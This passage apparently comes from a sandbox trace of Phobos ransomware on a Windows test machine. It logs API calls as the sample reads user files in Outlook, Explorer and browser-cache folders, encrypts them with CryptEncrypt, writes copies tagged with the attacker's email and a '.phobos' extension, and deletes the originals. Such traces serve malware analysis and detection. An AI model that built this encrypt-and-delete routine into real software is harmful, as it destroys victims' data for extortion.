lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0188.786] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.786] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0188.787] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0188.787] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.787] ReadFile (in: hFile=0xb8, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xb9, lpOverlapped=0x0) returned 1 [0188.789] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xc0, dwBufLen=0xc0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xc0) returned 1 [0188.789] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xc0, lpOverlapped=0x0) returned 1 [0188.790] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0188.790] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.790] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0188.790] CryptDestroyKey (hKey=0xa32a28) returned 1 [0188.790] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0188.790] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0188.790] CloseHandle (hObject=0xb8) returned 1 [0188.790] CloseHandle (hObject=0x12c) returned 1 [0188.790] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi")) returned 1 [0188.791] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0188.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog.etl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog.etl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0188.792] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=24576) returned 1 [0188.792] CloseHandle (hObject=0x12c) returned 1 [0188.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog.etl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog.etl")) returned 0x2020 [0188.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog.etl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog.etl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog.etl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0188.792] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.793] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog.etl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog.etl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0188.793] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0188.793] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.793] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x6000, lpOverlapped=0x0) returned 1 [0188.871] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6010, dwBufLen=0x6010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6010) returned 1 [0188.872] WriteFile (in: hFile=0xb8, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6010, lpOverlapped=0x0) returned 1 [0188.873] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0188.873] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.873] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0188.873] CryptDestroyKey (hKey=0xa32c28) returned 1 [0188.873] WriteFile (in: hFile=0xb8, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0188.875] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0188.875] CloseHandle (hObject=0x12c) returned 1 [0188.875] CloseHandle (hObject=0xb8) returned 1 [0188.875] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\ExplorerStartupLog.etl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\explorerstartuplog.etl")) returned 1 [0188.876] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0188.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0188.877] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1035) returned 1 [0188.877] CloseHandle (hObject=0xb8) returned 1 [0188.877] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[1]")) returned 0x2020 [0188.877] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0188.878] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.878] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0188.880] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0188.880] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.880] ReadFile (in: hFile=0xb8, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x40b, lpOverlapped=0x0) returned 1 [0188.905] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x410, dwBufLen=0x410 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x410) returned 1 [0188.906] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x410, lpOverlapped=0x0) returned 1 [0188.906] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0188.906] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.906] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0188.906] CryptDestroyKey (hKey=0xa32c28) returned 1 [0188.907] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0188.907] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0188.907] CloseHandle (hObject=0xb8) returned 1 [0188.907] CloseHandle (hObject=0x12c) returned 1 [0188.907] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[1]")) returned 1 [0188.908] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0188.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[3]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[3]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0188.911] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1330) returned 1 [0188.911] CloseHandle (hObject=0x12c) returned 1 [0188.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[3]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[3]")) returned 0x2020 [0188.912] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[3].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[3].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[3]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[3]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0188.912] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.912] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[3].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[3].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0188.913] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0188.913] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.913] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x532, lpOverlapped=0x0) returned 1 [0189.121] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x540, dwBufLen=0x540 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x540) returned 1 [0189.121] WriteFile (in: hFile=0xb8, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x540, lpOverlapped=0x0) returned 1 [0189.122] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0189.122] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0189.122] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0189.122] CryptDestroyKey (hKey=0xa32d28) returned 1 [0189.122] WriteFile (in: hFile=0xb8, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0189.123] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0189.123] CloseHandle (hObject=0x12c) returned 1 [0189.123] CloseHandle (hObject=0xb8) returned 1 [0189.123] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[3]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[3]")) returned 1 [0189.124] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0189.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede12;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=627518548[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0189.125] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3234) returned 1 [0189.125] CloseHandle (hObject=0xb8) returned 1 [0189.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede12;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=627518548[1]")) returned 0x2020 [0189.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=627518548[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede12;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=627518548[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede12;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=627518548[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0189.126] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0189.126] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0189.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=627518548[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede12;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=627518548[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0189.128] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0189.128] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0189.128] ReadFile (in: hFile=0xb8, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xca2, lpOverlapped=0x0) returned 1 [0189.139] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xcb0, dwBufLen=0xcb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xcb0) returned 1 [0189.139] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xcb0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xcb0, lpOverlapped=0x0) returned 1 [0189.141] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0189.141] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0189.141] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x150, 